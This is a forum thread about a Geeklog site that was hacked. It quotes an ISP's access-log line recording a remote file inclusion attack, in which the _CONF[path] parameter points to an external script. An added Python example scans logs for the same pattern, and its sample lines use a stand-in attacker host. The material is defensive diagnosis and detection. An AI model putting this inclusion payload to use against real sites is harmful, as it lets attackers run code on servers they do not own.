Geeklog Forums
Security Flaw in 1.4.1 or did I not upgrade correctly?
Lex
Anonymous
After my site was hacked up I upgraded to 1.4.1 last night.
My ISP contacted me this morning saying there are still successful hacks. From my ISP...
Here is the log entry I mentioned on the phone. This looks like the
most recent successful hack:
79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET /plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631 www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "-"
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Do you have a file /plugins/spamx/Mass.php? You shouldn't. And that directory shouldn't be in your webroot or at least should be password-protected.
FWIW, we have hundreds of these hacking attempts every day, but if you have your plugins directory outside of the webroot or password-protect it, they won't do anything.
"Mass.php" is not part of Geeklog, so if you have such a file, it may be a leftover from the hack. In which case you should remove it ASAP.
Also see this thread for someone with a similar problem.
bye, Dirk
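Added example (not part of the original thread and not Geeklog code): a small log check for requests like the one the ISP quoted, where a query parameter such as _CONF[path] carries a remote URL, reporting whether the server actually served the targeted file. The function name, field names and sample log lines are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qsl

# Leading fields of an Apache-style access log line; trailing fields are ignored.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) '
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_include_attempts(lines):
    """Flag requests whose query string passes a remote URL as a parameter value."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes names and values, so encoded variants match too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                status = int(m["status"])
                findings.append({
                    "ip": m["ip"], "path": path, "param": name, "status": status,
                    # 2xx: the server served the targeted file, so review it.
                    # A password-protected or relocated directory answers 401 or 404.
                    "served": 200 <= status < 300,
                })
                break
    return findings

# Constructed sample lines (documentation IPs and hosts), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2007:11:19:08 -0500] "GET /plugins/spamx/Mass.php//geeklog//'
    'plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://attacker.example.invalid/x.txt? '
    'HTTP/1.1" 200 631 www.example.org "-" "Mozilla/4.0" "-"',
    '198.51.100.7 - - [12/Dec/2007:11:20:41 -0500] "GET /plugins/spamx/BaseAdmin.class.php'
    '?_CONF%5Bpath%5D=http%3A%2F%2Fattacker.example.invalid%2Fx.txt HTTP/1.1" 404 209 '
    'www.example.org "-" "Mozilla/4.0" "-"',
    '203.0.113.5 - - [12/Dec/2007:11:21:02 -0500] "GET /index.php?topic=General HTTP/1.1" '
    '200 5120 www.example.org "-" "Mozilla/4.0" "-"',
]

if __name__ == "__main__":
    for finding in find_remote_include_attempts(SAMPLE_LOG):
        print(finding)
```

This is a heuristic: parameters that legitimately carry URLs will also be flagged and need an allowlist, and a 2xx status only shows the file was reachable, not what it did.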
Lex
Anonymous
I was unaware that the plugins directory was supposed to be outside the webroot. I've been running it for years inside. Is that a common mistake that other people make or am I the only one?
jmucchiello
Forum User
Full Member
Registered: 08/29/05
Posts: 985
Only public_html is supposed to be inside the webroot.
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by: Lex
I was unaware that the plugins directory was supposed to be outside the webroot.
That has always been our recommendation. Unfortunately, popular autoinstallers like Fantastico have been doing it wrong from day 1 without our knowledge.
bye, Dirk